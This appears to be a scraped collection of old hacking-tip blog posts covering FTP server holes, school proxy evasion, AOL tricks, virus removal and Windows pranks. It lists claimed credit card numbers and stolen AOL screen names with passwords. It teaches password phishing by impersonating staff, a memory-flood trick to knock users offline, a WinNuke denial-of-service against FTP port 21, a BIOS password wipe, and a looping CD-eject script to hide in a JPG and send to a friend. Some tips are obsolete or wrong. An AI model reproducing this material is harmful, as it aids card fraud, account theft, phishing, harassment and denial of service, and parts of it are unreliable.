www.securityfocus.com):CERT (Computer Emergency Response Team) - http://cert.orgX-Force Search (simplest) - http://www.iss.net/cgi-bin/xforce/xforce_index.plPacket Storm - packetstorm.genocide2600.comBugTraq Archives - http://www.securityfocus.com/level2/bottom.html?go=searchFyodor's Exploit World - http://www.insecure.org/sploits.htmlSpikeman's Denial Of Service Website (for DoS(9) attacks against FTP servers) - http://www.genocide2600.com/~spikeman/RootShell - http://www.rootshell.comSlashdot - http://www.slashdot.orgData - http://www.hideaway.net/data.html(Please report all dead links to barakirs@netvision.net.il)
Note: one might think that the above sites are considered illegal, since they feature explanations about security holes and how to exploit them.Well, screw one. These things are called "advisories" and they allow you to find holes on your own PC and fix them. Whether you use this information to secure yourself or hack others is your own choice. It's the difference between legitimate and illegal.
After you get to one of the following search sites (I recommend the BugTraq Archives) search for the keywords you want.For example: you find out(5) that your target is using this OS with this FTP server and this Webserver program etc'. Try combining all of those pieces of information and I'm sure you'll find the holes that fit you the most.You can also try searching holes on your own computer.Speaking about holes, we will explain about many security holes on the upcoming Sendmail tutorial (see blacksun.box.sk).Now, for several selected FTP holes.
Selected FTP Holes******************The following FTP holes aren't new or extraordinary or incredibly fantastic or anything of that sort of matter. They're just good for learning.I picked some interesting FTP holes and written a small explanation about them just to get the newbies started.Note: the sites I got these from aren't "evil hacking sites". These explanations are called advisories and they are meant to be used by people who want to fix bugs on their systems. Whether you use them for that purpose or others is none of our business.
1) Some FTP daemons allows a premature PASV command, which can cause some FTP daemons to crash with a core dump(9). FTP core dumps can be used to salvage encrypted passwords, bypassing any shadow password scheme.It is not known exactly which servers are immune to this and which are not, and the only workaround right now is to get a newer FTP server program.Also see
http://www.genocide2600.com/~spikeman/bisonware3.html for a DoS(9) attack against BisonWare FTP Server 3.5 similar to this hole.
2) FTP Bounce Attack (too long, see
http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1425 (From BugTraq))
3) Local bug in FTP Daemon (too long, see
http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1345 (From BugTraq))
4) (Quotes in partfrom BugTraq) Impact: Anybody from outside can shutdown your pc ftp server. And if u are under win3.1 the system will crash.Program: WinQVT/NETVersion: All versions.. 16 and 32 bitsSolution.. dont use it or upgradeExploit: Just Send a OOB (Out of Band) to port 21,Exploit for dummies: Take any winnuke, start it, and when u find a "139" change it to "21" instead.OK, I know this is stupid....... :P. But maybe somebody will need it.. who knows...Note: A patched version of NT 4.0 isn't vulnerable to this running MS's FTP server. I haven't had a chance to test an unpatched server, but IIRC, I did check the FTP port when the OOB problem was first reported and it didn't cause a crash.I would suspect that this could be a DOS/Win problem in general, and might not be specific to the WinQVT package.
I hope this helped you learn how to find holes. There will be much more examples in the Sendmail tutorial.
The Stupid Bug Corner---------------------I found this on an "elite" website made by a bunch of "elite" "hackers".They said that in order to "hack an FTP" you need to connect to it and send the following commands:quote user ftpquote cwd ~rootquote pass ftpBasically, what the so-called hacker is trying to do here is to enter a username to get into the system, change the user to root(7) and then enter a password for the username.This only works on VERY badly-configured FTP servers (the author mentioned that "this doesn't work on every FTP server". Well, I've got news for you - this doesn't work. Period. Unless you're talking about some 5 years old boy who just got a computer and clicked on some buttons and accidently set up an FTP server).
Appendix A: the SYST command----------------------------Entering the SYST command while connected to an FTP server often reveals valuable information on a system, such as the OS, which version and information about the FTP server.Get access to an FTP server somehow (by using a username and a password you know or by using anonymous login - login: anonymous password:your-email-address@your.isp. You could also enter someone else's Email address, the server doesn't actually verifies the address you send or anything) and then type the SYST command.
Newbies Corner--------------1. Protocol - a set of rules and regulations, similar to a language. When two computers know the same protocol, they can use it to communicate with each other.
2. Port - (for the more technical explanation of what ports are, see the end of this explanation) ports are like holes that enable things (data, in this case) to come in or out of them.There are physical ports and software ports on your computer. Physical ports are those slots on the back of your computer, your monitor etc'. Now, software ports are used when connecting to other computers.For example: I just bought a new computer and I want to turn it into a webserver (I want to enable people to access selecetd web pages, pictures, cgi and java scripts or applets, programs etc' that are located on my computer). In order for that to happen, I need to install a webserver software.The webserver software opens a port on my computer and names it port 80. Then it listens to incoming connections on that port.When someone starts his Internet browser (Netscape, Lynx, Microsoft Explorer etc') and surfs to my website, his browser connects to my computer on port 80 and then sends HTTP commands that my webserver program can understand into it.My webserver program quickly picks up the incoming data and then sends it back into a port that the surfer's browser opened on the surfer's computer. The browser will listen on that port and wait for the data (the HTML page, the picture, the program etc') to come in through it.There are different ports for different services (we'll get to that) so data won't mix up. Imagine your browser getting data your FTP client was supposed to get.I hope you got the main idea of what a port is.Now, there are three kinds of ports: well-known ports, registered ports and dynamic/private ports.The well known ports are those from 0 through 1023. These are default ports for several services (a webserver is a service because it listens for connections from remote computers and then sends something back). For example: the default port for webservers is 80. Else, how would your browser know which port he has to access?Now, the registered ports are those from 1024 through 49151. These ports are reserved for several programs. For example: ICQ (
www.icq.com) reserves a port and listens to incoming messages on it.The dynamic and/or private ports are those from 49152 through 65535, and can be used by anyone for any given purpose.
"Techy Explanation" - To grant simultaneous access to the TCP module, TCP provides a user interface called a port.Ports are used by the kernel to identify network processes. These are strictly transport layer entities (that is to say that IP could care less about them).Together with an IP address, a TCP port provides provides an endpoint for network communications.In fact, at any given moment *all* Internet connections can be described by 4 numbers: the source IP address and source port and the destination IP address and destination port.Servers are bound to 'well-known' ports so that they may be located on a standard port on different systems.For example, the telnet daemon sits on TCP port 23, the FTP daemon sits on TCP port 21, the rlogin daemon sits on TCP port 513 etc'.
Important note about well-known ports: services (daemons waiting for incoming connections that serve people in some way) on these ports can be only ran by root, so inferior users won't start messing up with important ports.
3. Mirror site - a website which is an exact copy of the original website which is hosted by a different server.Mirror sites can be used to speed up downloads/uploads. For example: instead of downloading/uploading from/to the main tucows webserver, located somewhere distantly from my home, I can simply do it from one of their Israeli mirrors (mirror site located in Israel, my country) and that way the downloads/uploads would go faster.
4. Path - UNIX example: if a file is located at /etc/passwd, the file's path would be /etc. DOS/Windows example: if a file is located at c:\windows\win.exe, the file's path would be c:\windows.There are two kinds of paths: a complete path and a relative path. Complete path on DOS/Windows: if the file is located on c:\program files\quickview plus\ then this is the file's complete path. Complete path on UNIX: if the file is located at /usr/local/sbin then this is the file's complete path. Relative path on DOS/Windows: if the current directory (the directory you are on at the moment) is c:\windows and the target file is located at c:\windows\temp then the relative path to this file is temp. Relative path on UNIX: if the current directory is /usr/nobody and the file is located at /usr/nobody/public_html/cgi-bin then the file's relative path is public_html/cgi-bin.
5. Client / Server programs - A client program is a program that uses a resource offered by another program/computer.A server program is a program that supplies resources to client programs.Example: Client=Netscape Navigator. Server=Apache version 1.6.6 (a webserver, meaning a program that lets people who use Internet browsers to download specific web pages, pictures, files etc' from the computer it is installed on).
6. How to find out information about remote hosts - the best way to find out information is too look at daemon(6) banners. Daemon banners are small pieces of information some daemons return when connected to in order for the remote machine (the one connecting to the daemon) to know how to interact with them better.Try connecting to port 80 (webserver) and sending some commands like get and then looking at the banner. You may also try Sendmail (see next tutorial) on port 25, Telnet on port 23, FTP on port 21 or whatever you can come up with.
7. Daemon - a program that listens for incoming connections from remote machines on a specified port(2) and interacts with them.
8. Root - also referred as superuser, because his permissions are endless. His UID (User ID number, an identification number and user on a UNIX system has) and GID (Group ID. You can create groups and give them several permissions. For example: everyone from the accounting department can read and execute all the files on this directory, etc') are always 0 (except on very altered boxes).Once you are root, you can do practically anything on a system.Core Dump - when a program crashes it dumps all the core (all the info it handles that isn't saved on disk, meaning all of the program's stuff that are on the RAM chip) into a temporary file.
9. DoS - Denial of Service. A nuke in dummies language. Some kind of an attack that causes the target computer to deny some/all kinds of services to the users of that computer (including remote users).For example: Winnuke (also known as OOB), the simplest DoS in the world.(Taken from Spikeman's DoS site) This denial of service program affects Windows clients by sending an "Out of Band" exception message to port 139, which does not know how to handle it. This is a standard listening port on Windows operating systems. Users of Win 3.11, Win95, andWin NT are vulnerable to this attack. This program is basically a nuisance program, but it is being widely circulated over the internet now. It has become a bother in chatrooms and on IRC. By using your IP# and sending OOB data to port 139, malicious users can disconnect you fromthe net, often leaving you with low resources and the blue tinted screen. Some of you may have been victims already. If this happens to you on Win 95, you will see a Windows fatal error message similar to the following:Fatal exception 0E at 0028: in VxD MSTCP(01) + 000041AE.This was called from 0028: in VxD NDIS(01) + 00000D7C.Rebooting the comp should return it to normal state.
Patches ("fixes") For WinNuke (OOB) -=-=-=-=-=-=-=-=-=-=-=-Additional Information on WinNuke
http://support.microsoft.com/support/kb/articles/Q168/7/47.asp Windows 95 Patcheshttp://support.microsoft.com/download/support/mslfiles/Vipup11.exehttp://support.microsoft.com/download/support/mslfiles/Vipup20.exe (for Winsock 2.0*)http://www.theargon.com/defense/nuke/index.htmlPlease read notes referring to 95 patches before installing. Which version of Winsock do you have on your Windows 95 PC?http://premium.microsoft.com/support/kb/articles/Q177/7/19.asphttp://www.theargon.com/defense/nuke/index.htmlWindows NT 4.0 Patchhttp://support.microsoft.com/support/kb/articles/Q143/4/78.asphttp://www.theargon.com/defense/nuke/index.htmlPlease read notes referring to Windows NT patches before installing.
More info on DoS attacks can be found at Spikeman's DoS site:
http://www.genocide2600.com/~spikeman/main.html
* I do not know it it will work on newer versions of Winsock, so you'd better downgrade to Winsock 1.1 (the version that comes with Windows 95) by going to Control Panel, Network and removing TCP/IP and Dial Up Adapter(11) and then readding them (click add, choose protocol and in the company frame choose Microsoft and you'll find TCP/IP. For DUN do the same but choose adapter instead of protocol).After you finish downgrading reupgrade to Winsock 2.0, apply the patch (Vipup20.exe) and then upgrade to newer versions of Winsock.
10. Flames - the action of flaming someone (send him angry mail about things he has done, opinions he has etc' which you do not agree with).
11. DUN - Dial Up Adapter. Basically it's the Windows program that dials to your ISP(12).
12. ISP - Internet Service Provider. A company that provides Internet services, such as Internet connectivity, web hosting, Email services etc'.
13. Distro - Distribution. Since UNIX is not a registered patent, trademark, copyrighted or whatever there are many distributions (software packages) of it. Every distro has it's own advantages and disadvantages (example: Redhat is the best for beginners).
Next Tutorials--------------The next tutorial will be about Sendmail, the buggiest daemon on earth - what is Sendmail, Sendmail commands, how to hack through Sendmail, how to send completely untracable mail, a newbies corner (what is a daemon, how to trace mail etc') and much much more.If this tutorial scores 7 points out of 10, then the Sendmail tutorial with score 12. First of all, it's gonna be veery looong and it'll have lots of side tips and thorough explanations about security holes and tips and tricks and tons of cool stuff I havn't thought of yet.Besides, I did this tutorial in a rush 'cause I didn't have much time to work on it*, but summer vacation is coming up so I'll have plenty of time to work on the Sendmail tutorial.The 3rd tutorial will be probably about UNIX Shell Programming. I don't wanna give away any details right now, and besides - I'm not so sure about this title. Maybe I'll change it to an "All you wanted to know about IRC wars and never had the guts to ask" tutorial. Who knows.I'll set up a electronic poll soon so you'll be able to vote on that subject or suggest other titles (subscribe to the mailing list and you'll be notified when it's ready. To subscribe, go to blacksun.box.sk and go to the Mailing List page).For more information, head down to blacksun.box.sk. Don't forget to drop us a line!
* Just installed Redhat 6.0. Yeah, yeah, I know, it's not exactly the best Linux distro(10) out there (I'm trying not to offend all of you Redhat users out there), but I wanted to see how it looks and everything.I gotta tell you, the installation is EEE-ZZZ comparing to other distros, and it's great for beginners.
Note: before I'll release the Sendmail tutorial I will send out some mini-tutorials, such as "Buffer Overflows", "Overclocking", "RM Networks" etc'.
Other Tutorials---------------Overclocking.RM Networks Hacking.Ad and Spam Blocking.Sendmail (creating fake mails and hacking servers that run Sendmail).Get them all at blacksun.box.sk, or join the mailing list at blacksunresearch.listbot.com.
Bibliography------------BugTraq Archives -
http://www.securityfocus.com/level2/bottom.html?go=searchRootShell - http://www.rootshell.comFyodor's Exploit World - http://www.insecure.org/sploits.htmlPacket Storm - http://packetstorm.harvard.eduX-Force Search (simplest) - http://www.iss.net/cgi-bin/xforce/xforce_index.plSlashdot - http://www.slashdot.orgSpikeman's Denial Of Service Website - http://www.genocide2600.com/~spikeman/PC Magazine - http://www.pcmagazine.com
Other Tutorials---------------* FTP Hacking.* Overclocking.* Ad and Spam Blocking.* Sendmail.* Phreaking.* Advanced Phreaking.* Phreaking II.* IRC Warfare.* Windows Registry.* Info Gathering.* Proxy/Wingate/SOCKS.* Offline Windows Security.* ICQ Security.
Read more

Double proxy method

==========================================================================The Double Proxy method==========================================================================
Have you ever been at school (for those who still go), and were on the computers and tried to goto
www.2600.com or something else of that sort? Of course you get something like Can’t access this damn place cause we don’t want you there. And of course you have tried the methods of the article before this one called Getting pass 403 proxy bans, but it still won’t let you in? Well there is hope yet. First to start off with I am going to tell you some ways that *might* work effectivly. Most of these are from the article on ‘403’ bans but the Double proxy method is my own. 1. Try taking the www. off of the address. Sometimes that works. 2. Try using mIRC or something like a DNS tool to lookup the IP of the address and use the IP instead. ex: http://123.45.567 instead of http://www.com 3. Try using .net instead of .com some sites have both. 4. Look for mirrior addresses for the place and use them. They might work. 5. Use the Double proxy method. Yep thats right. This is almost unstoppable. I have yet a way to stop it. And here it is:
The Double Proxy Method(DPM) is just using one site to hide another one. I run our school’s network prety much and can always remove the proxy and just browse, but what would the fun in that be?(no you can’t just click don’t use proxy, etc) So I found this. All you do is goto
www.cyberarmy.com or an alike site and scroll down until you see the box where you enter a address and browse anonymously using their proxy like thing. So if I want to goto 2600.com I just goto www.cyberarmy.com and enter in the address ex: www.2600.com and hit submit. Wow guess what comes up? FREE KEVIN!!!!
No this doesn’t take a rocket scientist to figure this out but still its a good method. And if
www.cyberarmy.com is blocked you just go to a computer and download the cgi code to run your own proxy like thing and presto you have the Double Proxy Method. (Using one proxy to hid the real site from the original proxy.) Pretty slick eh?
enjoyyyyy

Read more

AOL HACKING



First of all, this file will be of the most help to the beggining
hacker on AOL, while most experienced hackers will find most of the
information useful, but not all will be new to them. Now on with the
hacking!

We will start out with easy things...


-------------------------------------------------------------------------------------------------------------------------------
***How to send random IM's***

Go to "Send instant message" under the members pull down menu. Now, in
the space where it says "To", space over *exactly* ten (10) times. Then type
in the message and send! Easy, huh?

NOTE: this trick might also work with mail, try it 'cuz we haven't!


-------------------------------------------------------------------------------------------------------------------------------
***How to do Text Manipulation***

1st, using your mouse, highlight three lines of
text in the chat room. Make sure that all three lines have been said by
different people, and that you also highlight their screen names! Then, go
to the edit bar, and select copy. After that, Click your mouse on the spot
where you write what you want to say... Then go back up to the edit bar, and
click paste. All of the text that you have highlighted should show up where
you type in what you want to say. Now, find the screen name that has 2
little sqaures in front of it, and 1 behind it. Delete everything, except
that and the colon in-between them. Once you've done that, type what you
want to say after the squares, and type the persons screen name for who you
want to say it in side the squares. Then just send it, and it should
work...if it doesn't then you must REALLY be a lamer!


-------------------------------------------------------------------------------------------------------------------------------
***How to d/l for free and talk while downloading***

1. Start the dowload.

2. Hit ALT-TAB

3. Once you are in program manager hit ALT-F4

4. Windows will then say Exiting Windows "yes"
or "cancel"...hit yes

5. AOL will then ask you if you want to exit

6. Hit "no"

7. Your cursor will come back, you then can go
to a chat area and talk while your download
it still going.

8. The download window will still be there until
the download is complete

9. If you wanna download for free, do what
I explained above and instead of staying
in a chat area and talking just go into
a free area while it's downloading.


-------------------------------------------------------------------------------------------------------------------------------
***How to chat for free on AOL***

Ok...the first thing you do is click on the box at the bottom that says
discover AOL. Now choose "Best of AOL". Then minimize both windows.
Next...minimize the welcome screen...Ok almost there...now enter the free
area and go to the "Windows" pull down
menu. Select "Best of AOL". When it asks you if you want to leave the free
area select "NO". Guess what? The window opens anyway. Now move down until
you see "Chat Live". Click on it and it sends you to chat. Essentialy you
are in the free area but accessing chat. That's it. You are chatting for
free.

As far as I can tell this method is not only foolproof but also
GuideProof!:) I logged on with a hacked account and found a guide and talked
to her for 30 minutes and she never said anything so maybe they can't tell at
all. Well we'll see. Just remember this if they DO find out about it, it
will be a HELL of a lot easier for them figure out who is doing this than it
was for them to figure out who the fives were.

NOTE: To send mail, look at mail, download mail, etc. just open up and
minmize your mailbox instead or along with "Best Of AOL"

NOTE: You can minimize anything for this trick to work, not JUST "Best
Of AOL".


-------------------------------------------------------------------------------------------------------------------------------
***Using credit card numbers on AOL***

To use credit cards to pay for online time you must first know a couple
of things...Visa numbers always start with a 4, master card a 5, etc. This
is all you need to know! I will give you 20 free Visa Card numbers. But if
you got this file pack in it's entirety then you have credit.zip that
generates credit card numbers and you won't need these.

***VISA***
1. 4327 979 908 053 6. 4327 513 175 359 11. 4327 541 277 508 16. 4327 699 885 466
2. 4327 475 650 241 7. 4327 693 042 353 12. 4327 213 005 955 17. 4327 575 373 843
3. 4327 708 537 397 8. 4327 437 415 246 13. 4327 549 966 235 18. 4327 673 545 433
4. 4327 381 115 982 9. 4327 435 026 342 14. 4327 490 283 044 19. 4327 235 019 000
5. 4327 435 821 072 10. 4327 253 726 32015. 4327 396 359 385 20. 4327 758 958 295


-------------------------------------------------------------------------------------------------------------------------------
***The fine art of password fishing***

All this is, is using text manipulation to act as an authority and ask
for passwords. But here are some passwords\screen names that will work for you.

Screen name\password:
if you change the password for these screen names,
or hell if you just get new ones, tell me i am ThE cRowE
1) KenMcP \ HACK just ask around i will be on-line.
2)Luann Jamo \ lobeck
3)Jbatl4 \ Jbalt4
4)PETREE \ CONNOR
5)SusanM2273 \ 6180
6)NARANJITO \ NARANJITO
7)Packfan \ wolfpack

-------------------------------------------------------------------------------------------------------------------------------
***How to boot people off-line***

To do this trick the person MUST be on a PC! IM someone or get them
to IM you, when they reply type something in the message box and copy it, now hold down
Control-L and keep on pressing send. This overloads the memory or some shit
like that and they will be gone in a few minutes.

--------------------------------------------------------------------------------------------------------------------------------
***The "Ghost" trick***

THIS ONLY WORKS ON WINDOWS AOL

1. Hit CTRL-N, this opens up a new untitled file

2. Hit the space bar and hit Enter.

3. Hit the space bar and hit Enter again.

3. Continue this 10-15 times.

4. Highlight all of the lines with the mouse.

5. Go to the Edit menu and choose Copy.

6. Close the CTRL-N window.

7. Make sure the cusor is in the send box in the chat
area.

8. Go to the Edit menu again and choose Paste.

9. You should see a bunch of boxes in the send box
in the chat area.

10.Now Hit enter. And presto...ghost screen!

-------------------------------------------------------------------------------------------------------------------------------

If you have this file in zip. form then it SHOULD have come with these files:

aolhak.txt..........how to hack aol
credit.zip...........Credit Master Two



-------------------------------------------------------------------------------------------------------------------------------


-------------------------------------------------------------------------------------------------------------------------------

******WARNING******
ALL of the activites described above ARE illegal and are to be used for
ENTERTAINMENT purposes ONLY!We ll not be rsponsible for any misuse


Read more

Chat on LAN

Chat on LAN For chating in any lan you dont need any software .Just copy the code in the note pad .
@echo off:AClsecho MESSENGERset /p n=User:set /p m=Message:net send %n% %m%PauseGoto A
Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:
MESSENGERUser:
After "User" type the IP address of the computer you want to contact.After this, you should see this:Message:Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGERUser: 56.108.104.107Message: Hi
Now all you need to do is press "Enter", and start chatting!
Read more

How to remove autorun.inf virus

how to remove autorun.inf virus January 30, 2008 Autorun.inf virus removal
Autorun.INF is usually used by CD Installers to autoplay their installations but Hard disks by default should not have AUTORUN.INF in the drive.
Now, it is possible that your computer is infected by those viruses if you try to display the content of the your computer through command prompt, using the dir /ah command.


The said virus hides itself inside a folder named Recycled. The folder has a hidden/system/read-only attribute, that’s why you can’t see it if you will use the Search window. When your system is infected by the said virus, it infects every drive connected to your PC by dropping VCAB.DLL to the internet temporary folder and creating the CTFMON.EXE to folder Recyled & AUTORUN.INF to the root directory of every drive. That’s why when you connect your USB sticks to the infected PC it will be infected immediately, the USB disks will be the new carrier for the virus. The program runs every time you start your computer because it copy itself in the Startup folder of the Start Menu. It also run every time your insert the infected USB disk and it triggers every time you Double-Click the infected drive (bcoz of the AUTORUN.INF). The virus infects .EXEs and .DLLs.
To check if your system is infected by the said virus without using an antivirus, do the following steps:
Go to command prompt. Type CD\ in drive C to go the root directory Type DIR /AH and press ENTER key. This will display all hidden files in your drive C If you see a file AUTORUN.INF and a folder Recycled, then your system is infected. Try doing this to your USB drive and check if your USB stick contains the same folder and AUTORUN.INF, if it does then your system is really infected..

To remove it download and install a trial version of Trendmicro and scan your system.
To manually remove it (but i’m not recommending it especially if the infections of Bacalid is very high try using an anti-virus such as McAfee or TrendMicro’s PCCillin) follow the following steps (This is the step I take when i repair my computer without an internet connection. Note you should understand what you’re about to do, you try it at your own risk!)
Boot your system in Safemode
Go to command prompt, in Drive C do the following commands. Type -> ATTRIB -H -R -S AUTORUN.INF then press enter Type -> DEL AUTORUN.INF then press enter Type -> ATTRIB -H -R -S Recycled then press enter In Windows Explorer in Safemode, remove the folder Recycled in drive C use Shift-Delete to delete the folder. Repeat Step 3 to 6 for all drives of your system including the USB drive. Search for CTFMON.EXE in your system using the Search of Windows found in Start Menu. If you find a file that is not located in C:\WINDOWS\SYSTEM32, delete it immediately. Dont forget to empty the recycle bin afterwards (Usually the virus will copy itself in the Startup folder of the Startmenu. Check if the file is present there and delete it then.) To disable autorun of drives (i.e. everytime you double-click a drive or cd or usb, it is auto open) follow the following step:
Click Start->Run->type REGEDIT.EXE
Go to this key from the register HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\Explorer Look for the entry NoDriveTypeAutoRun, double click the entry Type a new value : 0FF (Hex) for the NoDriveTypeAutoRun, this will turn off the AutoRun for all drives, and press ENTER Reboot the system. Viruses that uses Autorun.INF
There are several viruses that uses the autorun.inf to spread itself such as the Bacalid (hides itself in ctfmon.exe) and the RavMon.EXE. These viruses set its file attributes to System+Hidden+Read-Only attributes so some anti-viruses will have a hard time detecting or finding them. These viruses save itself in the root directory of every available drives of the current infected computer and runs itself every time you Double-Click the drive. In USB Sticks and CDs that are infected by the virus runs automatically especially if drive autorun is enabled for the current drives (which is usually by default, autorun for drives are enabled).
Disable AUTORUN from Registry
Now you can disable the AUTORUN for all drives by configuring the registry. Open the registry by typing regedit.exe to the command prompt (if your still at the command prompt) or execute it in Run. Look for the HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\Explorer as shown below:
Double-click the NoDriveAutorun DWORD entry and type the value HEX: FF (255 in Decimal). (If the NoDriveAutorun does not exists, you can creat it by right-clicking the right side area of the regedit window, then click New->DWord Value -> type NoDriveAutorun) Close the registry and restart the computer. This procedure will disable all the autorun for all drives of your computer and at least will prevent the autorun function of infected USB drives or CDs and avoid the infection of viruses like the Bacalid and RavMon.exe
If you want to prevent viruses that uses autorun.inf to infect your USB flash drive, try to do this:
1. Open your flash drive via Command Prompt (do this via Start->Run->cmd.exe)
2. Change your logged drive to your USB flash drive (e.g. if your drive is at drive E: then type E: on the command prompt then press enter)
3. Create a folder named: AUTORUN.INF on the root directory of your flash drive. (to do this type the command: MD\AUTORUN.INF). If an error: a subdirectory already exists… shows, try to follow the instruction above to remove existing autorun.inf before doing this instruction.
The reason why this will avoid future infection is that autorun.inf viruses usually generates a file autorun.inf. Having an AUTORUN.INF folder on the root directory of your drives will make virus programs unable to create their own autorun.inf file, virus can’t even overwrite it because it’s a folder and not a file…
Read more

Hide any type of files in a JPG file

There is a trick in windows which gives you the opportunity to hide any type of files in a JPG file.This simple trick can be achieved in few steps:
Select the files you want to hide and compress them using winrar,winzip etc...Drag the compressed file and a random picture in the same directory(eg. C:\)Go to Start-->Run and type cmd in order to open the command promt windowGo to directory where you have placed the files (type cd.. twice to go to C:\)Type:COPY /B "name".jpg + "name".zip "new name".jpg
After that process a new jpg file will be crated in C:\ with the name: new name.If you double click you will see just the image,but if you right click to the file and select extract,your fidden files will be extracted
Read more

Crack bios password

There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one is more effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.
Follow the steps below:
1) Boot up windows.2) go to dos-prompt or go to command prompt directly from the windows start up menu.
3) type the command at the prompt: “debug” (without quotes ninja.gif )4) type the following lines now exactly as given…….o 70 10o 71 20quitexit
4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!!
EnjoYYYYYYYYYY
Read more

use trial versions 4ever

If u' have downloaded a program and it is 30 days or 15 days etc. kind of trial version and as well as fully functional then u can use it forever....simply go to

C#92;

Right Click

Autoexec.bat

Click on

Edit

at end add this line

time=1.1.1

so u can use trial version forever but time on ur computer clock will be wrong everytime.....
and whenever u want to remove this do same process and remove time=1.1.1 from end
Read more

Removing Ravmon Virus without Anti-Virus

Removing Ravmon Virus without Anti-Virus is easy, btw I haven’t met any Anti Virus which can remove this virus. They can stop your pc from being infected but once you are infected they wont be able to remove it.I don’t know the Actual Name of this virus nor its effects
Anyways its very easy to remove it.
You will have to follow just few simple steps.
check if your Infected. Stop currently running virus. Delete virus files. Remove virus to run from startup. So here are the following steps explained:
Remember until you delete the virus files please open drives using address bar by typing C:\ D:\ X:\ as the virus is activated if you double click the drive1. Right click any drive on your computer and see if right click menu shows some invalild characterslike this
If yes then you are infected.
2. Press Alt+Ctrl+Del to bring up the task manager (or right click taskbar to run it) there will be a program in processes named “SVCHOST.EXE” there will be few svchost in small case but check one in capital letters, if you see more than one “SVCHOST.EXE” (all caps one) end the one with your username infront of it instead of LOCAL SERVICE, NETWORK SERVICE or SYSTEM(by pressing end process).3. To delete the virus files you need to show system protected files.For this gotoMy Computer->(Menu) Tools-> Folder Options -> (Tab) View -> uncheck “Hide System protected files” -> press OKIf you are unable to unhide the system files you can use 3rd party softwares to browse drive and delete files, try ACDsee or WinRARNow open drive (by typing drive letter in address bar)Delete these 2 files
Autorun.inf Ravmon.exe Also delete those in all drives (not CD(WR) or DVD(WR) drives) (and remember don’t double click else you will have to start over from top) Open Windows folder and delete SVCHOST.EXE, SVCHOST.dll and MDM.EXENow restart the explorer.exe process by killing it in taskmanager and runing it again [(winkey + R), type “explorer” and hit enter]
Now right click the drive letter and ull see a clean menu congrats virus is removed 4. Now remove it from startup (Optional as files are deleted)Winkey + R type “msconfig” hit enter
Goto startup tab-> (uncheck) MDM -> OK -> Exit without RestartHow to prevent from this virus in featurejust right click any USB drive (that includes iPod) you have plugged into your PCif they have currpoted menu the drive is Infected।Access drive by typing Drive letter and Delete files from that driveRemember you double click the curropted drive you get infected else you are safe.

enjoy
Read more

Funny cd-rom hack

There is a code in VBS which helps you to hack , and open the tray of a cd-rom drive whenever it remains closed in few steps:


Open a notepad and paste the following code: do
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection

if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If

loop
Save the code as: xxx.vbs(where xxx:any name)
Now once you double click the saved file,your Cd-Rom drive will open whenever it is closed!


You can combine this trick with the hidding a file into jpg trick,
in order to send the file to a friend and mess with his cd-rom drive
Read more